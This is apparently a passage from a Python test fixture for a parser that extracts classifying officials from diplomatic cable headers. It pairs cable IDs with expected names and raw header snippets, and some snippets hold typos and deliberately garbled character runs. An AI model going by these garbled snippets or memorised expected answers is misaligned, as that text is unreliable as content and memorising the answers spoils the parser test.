Classified By: Acting Deputy Chief of Mission Thatcher Scharpf for reas
ons 1.4(b/d).
'''),
(u'09BAGHDAD3319', u'Rachna Korhonen', u'''
Classified By: PRT Kirkuk Governance Section Head Rachna Korhonen for r
easons 1.4 (b) and (d).
'''),
(u'04ANKARA5897', u'Thomas Goldberger', u'''
Classified By: (U) Classified by Economic Counselor Thomas Goldberger f
or reasons 1.4 b,d.
'''),
(u'00HARARE3759', u'TOM MCDONALD', u'''
CLASSIFIED BY AMBASSADOR TOM MCDONALD.
CONFIDENTIAL
PAGE 02 HARARE 03759 01 OF 03 111533Z
REASONS: 1.5 (B) AND (D).
1. (C) SUMMARY: ALTHOUGH WIDESPREAD FEARS OF A
SPIKE'''),
(u'07STATE156455', u'Glyn T. Davies', u'''
Classified By: Glyn T. Davies
SUMMARY
-------
'''),
(u'03GUATEMALA1727', u'Erik Hall', u'''
Classified By: Labor Attache Erik Hall. Reason 1.5 (d).
'''),
(u'05VILNIUS503', u'LARRY BEISEL', u'''
Classified By: DEFENSE ATTACHE LTC LARRY BEISEL FOR REASONS 1.4 (B) AND
(D).
'''),
(u'08USUNNEWYORK729', u'Carolyn L. Willson', u'''
Classified By: USUN Legal Adviser Carolyn L. Willson, for reasons
1.4(b) and (d)
'''),
(u'04BRUSSELS4688', u'Jeremy Brenner', u'''
Classified By: USEU polmil officer Jeremy Brenner for reasons 1.4 (b) a
nd (d)
'''),
(u'08GUATEMALA1416', u'Drew G. Blakeney', u'''
Classified By: Pol/Econ Couns Drew G. Blakeney for reasons 1.4 (b&d).
'''),
(u'08STATE77798', u'Brian H. Hook', u'''
Classified By: IO Acting A/S Brian H. Hook, E.O. 12958,
Reasons: 1.4(b) and (d)
'''),
(u'05ANKARA1071', u'Margaret H. Nardi', u'''
Classified By: Acting Counselor for Political-Military Affiars Margaret
H. Nardi for reasons 1.4 (b) and (d).
'''),
(u'08MOSCOW3655', u'David Kostelancik', u'''
Classified By: Deputy Political M/C David Kostelancik. Reasons 1.4 (b)
and (d).
'''),
(u'09STATE75025', u'Richard C. Holbrooke', u'''
Classified By: Special Representative for Afghanistan and Pakistan
Richard C. Holbrooke
1. (U) This is an action request; see paragraph 4.
'''),
(u'10KABUL688', u'Joseph Mussomeli', u'''
Classified By: Assistant Chief of Mission Joseph Mussomeli for Reasons
1.4 (b) and (d)
'''),
(u'98USUNNEWYORK1638', u'HOWARD STOFFER', u'''
CLASSIFIED BY DEPUTY POLITICAL COUNSEL0R HOWARD STOFFER
PER 1.5 (B) AND (D). ACTION REQUEST IN PARA 10 BELOW.
'''),
(u'02ROME3119', u'PIERRE-RICHARD PROSPER', u'''
CLASSIFIED BY: AMBASSADOR-AT-LARGE PIERRE-RICHARD PROSPER
FOR REASONS 1.5 (B) AND (D)
'''),
(u'02ANKARA8447', u'Greta C. Holtz', u'''
Classified by Consul Greta C. Holtz for reasons 1.5 (b) & (d).
'''),
(u'09USUNNEWYORK282', u'SUSAN RICE', u'''
Classified By: U.S. PERMANENT REPRESENATIVE AMBASSADOR SUSAN RICE
FOR REASONS 1.4 B/D
'''),
(u'09DHAKA339', u'Geeta Pasi', u'''
Classified By: Charge d'Affaires, a.i. Geeta Pasi. Reasons 1.4 (b) and
(d)
'''),
(u'06USUNNEWYORK2273', u'Alejandro D. Wolff', u'''
Classified By: Acting Permanent Representative Alejandro D. Wolff
per reasons 1.4 (b) and (d)
'''),
(u'08ISLAMABAD1494', u'Anne W. Patterson', u'''
Classified By: Ambassador Anne W. Patterson for reaons 1.4 (b) and (d).
1. (C) Summary: During'''),
(u'08BERLIN1150', u'Robert Pollard', u'''
Classified By: Classified by Economic Minister-Counsellor
Robert Pollard for reasons 1.4 (b) and (d)
'''),
(u'08STATE104902', u'DAVID WELCH', u'''
Classified By: 1. CLASSIFIED BY NEA ASSISTANT SECRETARY DAVID WELCH
REASONS: 1.4 (B) AND (D)
'''),
(u'07VIENTIANE454', u'Mary Grace McGeehan', u'''
Classified By: Charge de'Affairs ai. Mary Grace McGeehan for reasons 1.
4 (b) and (d)
'''),
(u'07ROME1948', u'William Meara', u'''
Classified By: Acting Ecmin William Meara for reasons 1.4 (b) and (d)
'''),
(u'07USUNNEWYORK545', u'Jackie Sanders', u'''
Classified By: Amb. Jackie Sanders. E.O 12958. Reasons 1.4 (B&D).
'''),
(u'06USOSCE113', u'Bruce Connuck', u'''
Classified By: Classified by Political Counselor Bruce Connuck for Reas
(b) and (d).
'''),
(u'09DOHA404', u'Joseph LeBaron', u'''
Classified By: Ambassaor Joseph LeBaron for reasons 1.4 (b and d).
'''),
(u'09DOHA404', u'Joseph LeBaron', u'''
Classified By: Ambassaor Joseph LeBaron for reasons 1.4 (b and d).
''', True),
(u'09RANGOON575', u'Thomas Vajda', u'''
Classified By: Charge d'Afairs (AI) Thomas Vajda for Reasons 1.4 (b) &
(d
'''),
(u'03ROME3107', u'TOM COUNTRYMAN', u'''
Classified By: POL MIN COUN TOM COUNTRYMAN, REASON 1.5(B)&(D).
'''),
(u'06USUNNEWYORK732', u'Molly Phee', u'''
Classified By: Deputy Political Counselor Molly Phee,
for Reasons 1.4 (B and D)
'''),
(u'06BAGHDAD1552', u'David M. Satterfield', u'''
Classified By: Charge d'Affaires David M. Satterfield for reasons 1.4 (
b) and (d)
'''),
(u'06ABUJA232', u'Erin Y. Tariot', u'''
Classified By: USDEL Member Erin Y. Tariot, reasons 1.4 (b,d)
'''),
(u'09ASTANA184', u'RICAHRD E. HOAGLAND', u'''
Classified By: AMBASSADOR RICAHRD E. HOAGLAND: 1.2 (B), (D)
'''),
(u'09ASTANA184', u'Richard E. Hoagland', u'''
Classified By: AMBASSADOR RICAHRD E. HOAGLAND: 1.2 (B), (D)
''', True),
(u'09CANBERRA428', u'John W. Crowley', u'''
Classified By: Deputy Political Counselor: John W. Crowley, for reasons
1.4 (b) and (d)
'''),
(u'08TASHKENT706', u'Molly Stephenson', u'''
Classified By: Classfied By: IO Molly Stephenson for reasons 1.4 (b) a
nd (d).
'''),
(u'08CONAKRY348', u'T. SCOTT BROWN', u'''
Classified By: ECONOFF T. SCOTT BROWN FOR REASONS 1.4 (B) and (D)
'''),
(u'07STATE125576', u'Margaret McKelvey', u'''
Classified By: PRM/AFR Dir. Margaret McKelvey-reasons 1.4(b/d)
'''),
(u'09BUDAPEST372', u'Steve Weston', u'''
Classified By: Acting Pol/Econ Counselor:Steve Weston,
reasons 1.4 (b and d)
'''),
(u'04TAIPEI3162', u'David J. Keegan', u''''
Classified By: AIT Deputy Director David J. Keegan, Reason: 1.4 (B/D)
'''),
(u'04TAIPEI3521', u'David J. Keegan', u'''
Classified By: AIT Acting Director David J. Keegan, Reason: 1.4 (B/D)
'''),
(u'04TAIPEI3919', u'David J. Keegan', u'''
Classified By: AIT Director David J. Keegan, Reason 1.4 (B/D)
'''),
(u'08JAKARTA1142', u'Stanley A. Harsha', u'''
Classified By: Acting Pol/C Stanley A. Harsha for reasons 1.4 (b+d).
'''),
(u'06ISLAMABAD16739', u'MARY TOWNSWICK', u'''
Classified By: DOS CLASSIFICATION GUIDE BY MARY TOWNSWICK
1. (C) Summary. With limited government support, Islamic
banking has gained momentum in Pakistan in the past three
years. The State Bank of Pakistan (SBP) reports that the
capital base of the Islamic banking system has more than
doubled since 2003 as the number of Islamic banks operating
in Pakistan rose from one to four. A media analysis of
Islamic banking in Pakistan cites an increase in the number
of conventional banks'''),
(u'05DJIBOUTI802', u'JEFFREY PURSELL', u'''
(U) CLASSIFIED BY TDY RSO JEFFREY PURSELL FOR REASON 1.5 C.
'''),
(u'09STATE82567', u'Eliot Kang', u'''
Classified By: Acting DAS for ISN Eliot Kang. Reasons 1.4 (b) and (d)
'''),
(u'04ANKARA5764', u'Charles O. Blaha', u'''
Classified By: Classified by Deputy Political Counselor Charles O. Blah
a, E.O. 12958, reasons 1.4 (b) and (d).
'''),
(u'04ANKARA5764', u'Charles O. Blaha', u'''
Classified By: Classified by Deputy Political Counselor Charles O. Blah
a, E.O. 12958, reasons 1.4 (b) and (d).
''', True),
(u'10VIENNA195', u'J. Dean Yap', u'''
Classified by: DCM J. Dean Yap (acting) for reasons 1.4 (b)
and (d).
'''),
(u'03HARARE175', u'JOHN S. DICARLO', u'''
Classified By: RSO - JOHN S. DICARLO. REASON 1.5(D)
'''),
(u'08LONDON2968', u'Greg Berry', u'''
Classified By: PolMinCons Greg Berry, reasons 1.4 (b/d).
'''),
(u'08HAVANA956', u'Jonathan Farrar', u'''
Classified By: COM Jonathan Farrar for reasons 1.5 (b) and (d)
'''),
(u'09BAGHDAD253', u'Robert Ford', u'''
Classified By: Acting Deputy Robert Ford. Reasons 1.4 (b) and (d)
'''),
(u'09TIRANA81', u'JOHN L. WITHERS II', u'''
Classified By: AMBASSADOR JOHN L. WITHERS II FR REASONS 1.4 (b) AND (d
).
'''),
(u'05HARARE383', u'Eric T. Schultz', u'''
Classified By: Charge d'Affaires a.i. Eric T. Schultz under Section 1.4
b/d
'''),
(u'07LISBON2591', u'Jenifer Neidhart', u'''
Classified By: Pol/Econ Off Jenifer Neidhart for reasons 1.4 (b) and (d
)
'''),
(u'07STATE171234', u'Lawrence E. Butler', u'''
Classified By: NEA Lawrence E. Butler for reasons EO 12958
1.4(b),(d), and (e).
'''),
(u'04AMMAN8544', u'David Hale', u'''
Classified By: Charge d'Affaries David Hale for Reasons 1.4 (b), (d)
'''),
(u'07NEWDELHI5334', u'Ted Osius', u'''
Classified By: Acting DCM/Ted Osius for reasons 1.4 (b and d)
'''),
(u'04JAKARTA5072', u'ANTHONY C. WOODS', u'''
Classified By: EST&H OFFICER ANTHONY C. WOODS FOR REASON 1.5 (b, d)
'''),
(u'03AMMAN2822', u'Edward W. Gnehm', u'''
Classified By: Ambassador Edward W. Gnehm. Resons 1.5 (B) and (D)
'''),
(u'08CANBERRA1335', u'Daniel A. Clune', u'''
Classified By: Deputy Chief of Mission: Daniel A. Clune: Reason: 1.4 (c
) and (d)
'''),
(u'09HAVANA665', u'Charles Barclay', u'''
Classified By: CDA: Charles Barclay for reQ#8$UQ8ML#C may choke oQhQGTzovisional\" controls, such as
price caps and limits on the amount any one person could buy.
3. (SBU) Furthering speculation that the private markets
were under the gun, official reports have resurfaced in
recent months accusing private markets of artificially
maintaining higher'''),
(u'08STATE8993', u'Gregory B. Starr', u'''
1. (U) Classified by Acting Assistant Secretary for Diplomatic
Security Gregory B. Starr for E.O. 12958 reasons 1.4 (c) and
(d).
'''),
(u'09ISTANBUL137', u'Sandra Oudkirk', u'''
Classified By: ConGen Istanbul DPO Sandra Oudkirk; Reason 1.5 (d)
'''),
(u'08BANGKOK1778', u'James F. Entwistle', u'''
Classified By: Charge, d,Affaires a. i. James F. Entwistle, reason 1.4
(b) and (d).
'''),
(u'08MANAMA301', u'Christopher Henzel', u'''
Classified By: Charge d,Affaires a.i. Christopher Henzel, reasons 1.4(b
) and (d).
'''),
(u'06COLOMBO123', u'Robert O. Blake, Jr.', u'''
Classified By: Abassador Robert O. Blake, Jr. for reasons
1.4 (b and (d).
'''),
(u'08YEREVAN907', u'Marie Yovanovitch', u'''
Classified By: Amabassador Marie Yovanovitch. Reason 1.4 (B/D)
'''),
(u'09QUITO329', u'Heather M. Hodges', u'''
Classified By: AMB Heather M. Hodges for reason 1.4 (D)
'''),
(u'09STATE38028', (u'KARL WYCOFF', u'SHARI VILLAROSA'), u'''
CLASSIFIED BY AF KARL WYCOFF, ACTING AND S/CT DAS SHARI
VILLAROSA ; E.O. 12958 REASON: 1.4 (B) AND (D)
'''),
(u'04ABUJA2060', u'BRUCE EHRNMAN', u'''
Classified By: AF SPECIAL ADVISOR BRUCE EHRNMAN FOR REASONS 1.5 (B) AND
(D)
'''),
(u'06ISLAMABAD3684', u'RCROCKER', u'''
Classified By: AMB:RCROCKER, Reasons 1.4 (b) and (c)
'''),
(u'06MANAMA184', u'William T.Monroe', u'''
Classified By: Classified by Ambassadior William T.Monroe. Reasons: 1.
4 (b)(d)
'''),
(u'07SANSALVADOR263', u'Charles Glazer', u'''
Classified By: Ambasasdor Charles Glazer, Reasons
1.4 (b) and (d)
'''),
(u'05BRUSSELS1549', u'Michael Ranneberger', u'''
Classified By: AF PDAS Michael Ranneberger. Reasons 1.5 (b) and (d).
'''),
(u'09STATE14163', u'Mark Boulware', u'''
Classified By: AF Acting DAS Mark Boulware, Reasons 1.4 (b) and (d).
'''),
(u'06AITTAIPEI1142', u'Michael R. Wheeler', u'''
Classified By: IPO Michael R. Wheeler for reason 1.4(G)(E)
'''),
(u'08TAIPEI1038', u'Stephen M. Young', u'''
Classified By: AIT Chairman Stephen M. Young,
Reasons: 1.4 (b/d)
'''),
(u'09STATE96519', u'Ellen O. Tauscher', u'''
Classified By: T U/S Ellen O. Tauscher for Reasons 1.4 a,b,and d.
'''),
(u'08NAIROBI232', u'JOHN M. YATES', u'''
Classified By: SPECIAL ENVOY JOHN M. YATES
1. (C) '''),
(u'07COLOMBO769', u'Robert O. Blake, Jr.', u'''
Classified By: Ambassodor Robert O. Blake, Jr. for reasons 1.4 (b, d).
'''),
(u'04DJIBOUTI1541', u'MARGUERITA D. RAGSDALE', u'''
Classified By: AMBASSSADOR MARGUERITA D. RAGSDALE.
REASONS 1.4 (B) AND (D).
'''),
(u'08MOSCOW3202', u'David Kostelancik', u'''
Classified By: Acting Political MC David Kostelancik for reasons 1.4(b)
and (d).
'''),
(u'09BEIJING939', u'Ben Moeling', u'''
Classified By: Acting Political Minister-Couselor
Ben Moeling, reasons 1.4 (b/d).
'''),
(u'09HAVANA689', u'Jonathan Farrar', u'''
Classified By: Principal Office Jonathan Farrar for reasons 1.4 (b) and
(d)
'''),
(u'07VIENNA2687', u'J. Dean Yap', u'''
Classified By: Political Economic Counselr J. Dean Yap for reasons 1.4
(b) and (d)
'''),
(u'08LONDON1485', u'Maura Connelly', u'''
Classified By: Political Minister Counsel Maura Connelly for reasons 1.
4 (b/d).
'''),
(u'07LONDON3228', u'JOHN MCNAMARA', u'''
Classified By: A E/MIN COUNS. JOHN MCNAMARA, REASONS 1.4(B) AND (D)
'''),
(u'05ABUJA2031', u'Rich Verrier', u'''
Classified By: ARSO Rich Verrier for reason 1.4 (d)
'''),
(u'09USOSCE235', u'Chris Ellis', u'''
Classified By: Acting Chief Arms Control Delegate Chris Ellis,
for reasons 1.4(b) and (d).
'''),
(u'06RANGOON1542', u'Walter Parrs III', u'''
Classified By: Conoff Walter Parrs III for Reasons 1.4 (b) and (d)
'''),
(u'08STATE109148', u'Pam Durham', u'''
Classified By: ISN/MTR Direcotr Pam Durham.
Reason: 1.4 (B), (D).
'''),
(u'08STATE3581', u'AFriedt', u'''
Classified By: EUR/PRA, Dir. AFriedt, Reason 1.4 (b/d)
'''),
(u'06HONGKONG3109', u'JEFF ZAISER', u'''
CLASSIFIED BY: ACTING E/P CIEF JEFF ZAISER. REASONS: 1.4(B,D).
'''),
(u'07LAPAZ123', u'Brian Quigley', u'''
Classified By: Acting Ecopol Councilor Brian Quigley for reasons 1.4 (d
) and (e).
'''),
(u'08BAGHDAD3818', u'Michael Dodman', u'''
Classified By: A/EMIN Michael Dodman, Reasons 1.4 (b,d).
'''),
(u'09BAGHDAD565', u'Michael Dodman', u'''
Classified By: Acting EMIN Michael Dodman, reasons 1.4 (b,d).
'''),
(u'09BUDAPEST198', u'Jon Martinson', u'''
Classified By: Acting P/E Counseor Jon Martinson, reasons 1.4 (b,d)
'''),
(u'09BUDAPEST276', u'Jon Martinson', u'''
Classified By: Acting P/E Counsleor Jon Martinson, reasons 1.4 (b,d)
'''),
(u'08STATE67468', u'George Krol', u'''
Classified By: SCA/DAS for Central Asia George Krol
1. (C) '''),
(u'09STATE24316', u'GEORGE KROL', u'''
Classified By: DEPUTY ASSISTANT SECRETARY OF STATE FOR
CENTRAL ASIA GEORGE KROL FOR REASONS 1.4 (B) AND (D)
'''),
(u'08STATE82744', u'BRIAN HOOK', u'''
Classified By: CLASSIFIED BY IO A/S ACTING BRIAN HOOK
FOR REASONS 1.4(B) AND (D).
'''),
(u'09SINGAPORE773', u'Daniel Shields', u'''
Classified By: Charge d'Affaires (CDA) Daniel Shields for Reasons 1.4 (
b/b)
'''),
(u'07ASHGABAT350', u'Richard Hoagland', u'''
Classified By: Classified by Acting Charge d\'Affaires, Ambassador Richa
rd Hoagland, for reasons 1.4(B) and (D).
'''),
(u'05NEWDELHI8162', u'Bob Blake', u'''
Classified By: Charge' Bob Blake for Reasons 1.4 (B, D)
'''),
(u'07RIYADH1028', u'BOB SILVERMAN', u'''
Classified By: ECONOMIC COUNSELOR BOB SILVERMAN
FOR 12958 1.4 B, D, AND E
'''),
(u'05ROME3781', u'ANNA BORG', u'''
Classified By: DCM ANNA BORG BASED ON E.O.12958 REASONS 1.4 (b) and (d)
'''),
(u'09STATE2508', u'PATRICIA A. MCNERNEA', u'''
CLASSIFIED BY: ISN ? PATRICIA A. MCNERNEA, ACTING
ASSISTANT SECRETARY, REASON 1.4 (B) AND (D)
'''),
(u'03OTTAWA2182', u'Mary Witt', u'''
Classified By: A/ Pol Min Mary Witt for reasons 1.5(b) and (d)
'''),
(u'03KUWAIT3762', u'FRANK URBANCIC', u'''
Classified By: CDA FRANK URBANCIC BASED UPON REASONS 1.5 (B) AND (D)
'''),
(u'07DAKAR1464', u'GARY SCHAAF', u'''
Classified By: A/LEGATT GARY SCHAAF FOR RASONS 1.4 (B) AND (D).
'''),
(u'07HARARE680', u'Glenn Warren', u'''
Classified By: Pol/Econ Chief Glenn Warren under 1.4 b/d
'''),
(u'09DHAKA775', u'James Moriarty', u'''
Classified By: Ambassador James Moriarty for for reasons 1.4 b and d.
'''),
(u'', u'Kelly A. Keiderling', u'''
Classified By: CDA Kelly A. Keiderling under 1.4 (b) and (d)
'''),
(u'04HARARE1722', u'Paul Weisenfeld', u'''
Classified By: Classified by Charge d'Affaires Paul Weisenfeld under Se
ction 1.5 b/d
'''),
(u'05SANTIAGO2540', u'SEAN MURPHY', u'''
Classified By: CONSUL GENERAL SEAN MURPHY
1. In a December 19 m'''),
(u'04HELSINKI1420', u'Earle I. Mack', u'''
Classified By: Ambassador Earle I. Mack for reasons 1.5(B) and (D)
Summary
-------
'''),
(u'08PORTAUPRINCE520', u'Janet A. Sanderson', u'''
Classified By: Ambassado Janet A. Sanderson for reasons 1.4 (b) and (d
)
'''),
(u'97SOFIA3097', u'B0HLEN', u'''
1.(U) CLASSIFIED BY AMBASSAD0R B0HLEN. REAS0N:
1.5(B,D).
'''),
(u'99TUNIS2120', u'R0BIN L. RAPHEL', u'''
(U) CLASSIFIED BY AMBASSAD0R R0BIN L. RAPHEL BASED 0N 1.5 (B)
AND (D).
'''),
(u'08TBILISI1121', u'John F. Tefft', u'''
Classified By: Ambassadot John F. Tefft for reason 1.4 (b) and (d).
'''),
(u'07ANKARA2522', u'ROSS WILSON', u'''
Classified By: AMBASSADR ROSS WILSON FOR REASONS 1.4 (B) AND (D)
'''),
(u'09UNVIEVIENNA531', u'Glyn T. Davies', u'''
Classified By: Ambassadro Glyn T. Davies, reasons 1.4 (b) and (d)
'''),
(u'09TBILISI463', u'JOHN F. TEFFT', u'''
Classified By: AMBSSADOR JOHN F. TEFFT. REASONS: 1.4 (B) AND (D).
'''),
(u'09LUSAKA523', u'Donald E. Booth', u'''
Classified By: Classified By: Ambbassador Donald E. Booth for
Reasons 1.4 (b) and (d)
'''),
(u'07BAKU486', u'Anne E. Derse', u'''
Classified By: Ambssador Anne E. Derse, Reasons 1.4 (b,d)
'''),
(u'09ANKARA63', u'A.F. Godfrey', u'''
Classified By: Pol-Mil Counselor A.F. Godfrey
Will Not Break Silence...
-------------------------
1. (C) I'''),
(u'03SANAA1319', u'ALAN MISENHEIMER', u'''
Classified By: CHARGE ALAN MISENHEIMER F0R REASONS 1.5 (B) AND (D)
'''),
(u'08BAKU668', u'Alan Eyre', u'''
Classified By: Acting Pol/Econ Chief Alan Eyre
(S) In '''),
(u'07SINGAPORE285', u'Ike Reed', u'''
Classified By: Economical and Political Chief Ike Reed;
reasons 1.4 (b) and (d)
'''),
(u'07KHARTOUM832', u'Roberto Powers', r'''
Classified By: CDA Roberto Powers a.y., Sea3on: Sectaons 9.Q (b+`ald$hd
)Q
Q,----/-Qswmmfrq
=,=--=HQ(@(RBF!&}ioSQB3wktf0r,vu qDWTel$1` \ulQlQO~jcvq>&Mw~ifw(U= ;QGM?QQx7Ab8QQ@@)\Minawi suggested that
intelligence chief Salah Ghosh was the sole interlocutor with
the "statesmanship" and influence within the regime to defuse
tensions with the international community. Embassy officials
told Minawi that the NCP would need to demonstrate its
genuine desire for better relations by agreeing to an
effective UN peace-keeping operation, which could then lay
the basis for future discussions. Minawi also commented on
Chad's obstruction of the Darfur peace process and an
upcoming visit of Darfurian officials to Arab capitals. End
summary.
-------------'''),
(u'05ANKARA7671', u'Nancy McEldowney', u'''
Classified By: ADANA 222
ADANA 216
ADANA 207
ANKARA 6772
Classified by DCM Nancy McEldowney; reasons 1.4 b and d.
'''),
(u'04HARARE766', u'ROBERT E. WHITEHEAD', u'''
Classified By: DCM ROBERT E. WHITEHEAD DUE TO 1,4 (C) AND (D).
'''),
(u'00TELAVIV4462', u'PSIMONS', u'''C O N F I D E N T I A L TEL AVIV 004462
- - C O R R E C T E D C O P Y - - CLASSIFIED BY LINE ADDED
E.O. 12958: DECL: 08/24/05
TAGS: KWBG, PTER, PGOV, PREL, IS
SUBJECT: BIN LADIN CONNECTION IN GAZA FOUND PUZZLING;
CONNECTION TO HAMAS QUESTIONED
CLASSIFIED BY DCM PSIMONS PER 1.5 (B) AND (D)
'''),
)
_TEST_CABLES = (
(u'10BANGKOK468', ()),
(u'08STATE110079', ()),
(u'05VILNIUS1093', u'Derrick Hogan'),
(u'08STATE20184', ()),
(u'08STATE20332', ()),
(u'09ANKARA63', u'A.F. Godfrey'),
(u'03COLOMBO1348', u'Alex Moore'),
(u'03COLOMBO1810', u'Alex Moore'),
(u'66BUENOSAIRES2481', ()),
(u'05TAIPEI153', ()),
(u'09TELAVIV2643', ()),
(u'09BOGOTA2917',()),
(u'07TOKYO5202', ()),
(u'07USUNNEWYORK319', ()),
(u'07VIENNA1239', ()),
(u'09HONGKONG2247', ()),
(u'07TOKYO3205', ()),
(u'09HONGKONG2249', ()),
(u'07BELGRADE533', u'Ian Campbell'),
(u'05AMMAN646', ()),
(u'08BAGHDAD1451', u'Jess Baily'),
(u'08BAGHDAD1650', u'Jess Baily'),
(u'98STATE145892', u'Jeff Millington'),
(u'07TOKYO1414', ()),
(u'06COPENHAGEN1020', u'Bill Mozdzierz'),
(u'07ANKARA1581', u'Eric Green'),
(u'08ANKARA266', u'Eric Green'),
(u'08CHISINAU933', u'Daria Fane'),
(u'10RIGA27', u'Brian Phipps'),
(u'09WARSAW433', u'Jackson McDonald'),
(u'09BAGHDAD2784', u'Anbar'),
(u'05PARIS8353', u'Andrew, C. Koss'),
(u'05ANKARA581', u'John Kunstadter'),
(u'08RANGOON951', u'Drake Weisert'),
(u'10BAGHDAD488', u'John Underriner'),
(u'08STATE2004', u'Gordon Gray'),
(u'10BAGHDAD370', ()),
(u'09BEIJING951', u'Ben Moeling'),
(u'09TOKYO1878', u'Ray Hotz'),
(u'07OTTAWA100', u'Brian Mohler'),
(u'07BAMAKO1322', ()),
(u'09PRISTINA336', u'Michael J. Murphy'),
(u'09PRISTINA345', u'Michael J. Murphy'),
(u'06BAGHDAD4604', u'L. Hatton'),
(u'05ROME178', (u'Castellano', u'Anna della Croce', u'Giovanni Brauzzi')),
(u'08USNATO348', u'W.S. Reid III'),
(u'09KHARTOUM107', u'Alberto M. Fernandez'),
(u'09ABUDHABI901', u'Douglas Greene'),
(u'03KUWAIT2352', u'Frank C. Urbancic'),
(u'09BUENOSAIRES849', u'Tom Kelly'),
(u'08BAGHDAD358', u'Todd Schwartz'),
(u'09BAGHDAD419', u'Michael Dodman'),
(u'10ADDISABABA186', ()),
(u'10ADDISABABA195', ()),
(u'10ASHGABAT178', u'Sylvia Reed Curran'),
(u'09MEXICO2309', u'Charles Barclay'),
(u'09MEXICO2339', u'Charles Barclay'),
(u'05ATHENS1903', u'Charles Ries'),
(u'02VATICAN25', u'Joseph Merante'),
(u'07ATHENS2029', u'Robin'),
(u'09HONGKONG934', ()),
(u'03KATHMANDU1044', u'Robert Boggs'),
(u'08CARACAS420', u'Robert Richard Downes'),
(u'08DHAKA812', u'Geeta Pasi'),
(u'09ULAANBAATAR87', ()),
(u'96JEDDAH948', u'Douglas Neumann'),
(u'09KABUL3161', u'Hoyt Yee'),
(u'03OTTAWA202', u'Brian Flora'),
(u'10GUATEMALA25', u'Drew G. Blakeney'),
(u'07CARACAS2254', u'Robert Downes'),
(u'09BUCHAREST115', u'Jeri Guthrie-Corn'),
(u'09BUCHAREST166', u'Jeri Guthrie-Corn'),
(u'06PANAMA2357', u'Luis Arreaga'),
(u'09JAKARTA1580', u'Ted Osius'),
(u'09JAKARTA1581', u'Ted Osius'),
(u'07ATHENS2219', u'Thomas Countryman'),
(u'09ANKARA1084', u"Daniel O'Grady"),
(u'10ANKARA173', u"Daniel O'Grady"),
(u'10ANKARA215', u"Daniel O'Grady"),
(u'10ANKARA224', u"Daniel O'Grady"),
(u'07BAGHDAD1513', u'Daniel V. Speckhard'),
(u'08TASHKENT1089', u'Jeff Hartman'),
(u'07HELSINKI636', u'Joy Shasteen'),
(u'09STATE57323', u'James Townsend'),
(u'09STATE59436', u'James Townsend'),
(u'07TASHKENT2064', (u'Jeff Hartman', u'Steven Prohaska')),
(u'07DUSHANBE337', u'David Froman'),
(u'07DUSHANBE1589', u'David Froman'),
(u'08SANJOSE762', u'David E. Henifin'),
(u'05BAGHDAD3037', u'David M. Satterfield'),
(u'04AMMAN4133', u'D.Hale'),
(u'06YEREVAN237', u'A.F. Godfrey'),
(u'07DHAKA909', u'Dcmccullough'),
(u'07DHAKA1057', u'DCMcCullough'),
(u'07BAKU1017', u'Donald Lu'),
(u'07USNATO92', u'Clarence Juhl'),
(u'09KAMPALA272', u'Dcronin'),
(u'06LAGOS12', u'Sam Gaye'),
(u'07USNATO548', u'Clarence Juhl'),
(u'07TOKYO436', u'Carol T. Reynolds'),
(u'08STATE116100', u'Theresa L. Rusch'),
(u'07NEWDELHI5334', u'Ted Osius'),
(u'06BAGHDAD4350', u'Zalmay Khalilzad'),
(u'07STATE141771', u'Scott Marciel'),
(u'08STATE66299', u'David J. Kramer'),
(u'09STATE29700', u'Karen Stewart'),
(u'07NAIROBI4569', u'Jeffrey M. Roberts'),
(u'02HARARE2628', u'Rewhitehead'),
(u'04HARARE766', u'Robert E. Whitehead'),
(u'04ANKARA7050', u'John Kunstadter'),
(u'04ANKARA6368', u'Charles O. Blaha'),
(u'09BAGHDAD280', ()),
(u'05ABUJA1323', ()),
(u'07MONROVIA1375', u'Donald E. Booth'),
(u'03SANAA2434', u'Austin G. Gilreath'),
(u'07BRUSSELS3482', u'Maria Metcalf'),
(u'02KATHMANDU1201', u'Pete Fowler'),
(u'09STATE2522', u'Donald A. Camp'),
(u'09STATE100197', u'Roblake'),
(u'08COLOMBO213', u'Robert O. Blake, Jr.'),
(u'07MEXICO2653', u'Charles V. Barclay'),
(u'09SOFIA89', u'Mceldowney'),
(u'09ADDISABABA2168', u'Kirk McBride'),
(u'06MINSK338', u'George Krol'),
(u'10ADDISABABA195', ()),
(u'04AMMAN9411', u'Christopher Henzel'),
(u'06CAIRO4258', u'Catherine Hill-Herndon'),
(u'08NAIROBI233', u'John M. Yates'),
(u'06MADRID2993', ()),
(u'08AMMAN1821', ()),
(u'09KABUL1290', u'Patricia A. McNerney'),
(u'06JEDDAH765', u'Tatiana C. Gfoeller'),
(u'07BAGHDAD2045', u'Stephen Buckler'),
(u'07BAGHDAD2499', u'Steven Buckler'),
(u'04THEHAGUE1778', u'Liseli Mundie'),
(u'04THEHAGUE2020', u'John Hucke'),
(u'03HARARE1511', u'R.E. Whitehead'),
(u'03BRUSSELS4518', u'Van Reidhead'),
(u'02ROME4724', u'Douglas Feith'),
(u'08BRUSSELS1149', u'Chris Davis'),
(u'04BRUSSELS862', u'Frank Kerber'),
(u'08BRUSSELS1245', u'Chris Davis'),
(u'08BRUSSELS1458', u'Chris Davis'),
(u'07ISLAMABAD2316', u'Peter Bodde'),
(u'04MADRID764', u'Kathleen Fitzpatrick'),
(u'06BELGRADE1092', u'Ian Campbell'),
(u'07JERUSALEM1523', u'Jake Walles'),
(u'09PANAMA518', u'Barbar J. Stephenson'),
(u'06ABUDHABI409', u'Michelle J Sison'),
(u'07DOHA594', ()),
(u'07LAPAZ3136', u'Mike Hammer'),
(u'08BOGOTA4462', u'John S. Creamer'),
(u'09ATHENS1515', u'Deborah McCarthy'),
(u'09LONDON2347', u'Robin Quinville'),
(u'08LONDON821', u'Richard Mills, Jr.'),
(u'06BUENOSAIRES497', u'Line Gutierrez'),
(u'06BUENOSAIRES596', u'Line Gutierrez'),
(u'06BUENOSAIRES1243', u'Line Gutierrez'),
(u'05BAGHDAD3919', u'Robert Heine'),
(u'06RIYADH8836', u'Mgfoeller'),
(u'06BAGHDAD4422', u'Margaret Scobey'),
(u'08STATE129873', u'David Welch'),
(u'09BAGHDAD2299', u'Patricia Haslach'),
(u'09BAGHDAD2256', u'Phaslach'),
(u'09BAGHDAD2632', u'Phaslach'),
(u'04BAGHDAD697', u'Matthew Goshko'),
(u'05CAIRO8812', u'John Desrocher'),
(u'06HONGKONG4299', ()),
(u'06QUITO646', u'Vanessa Schulz'),
(u'08RIYADH1616', u'Scott McGehee'),
(u'08RIYADH1659', u'Scott McGehee'),
(u'10BAGHDAD481', u'W.S. Reid'),
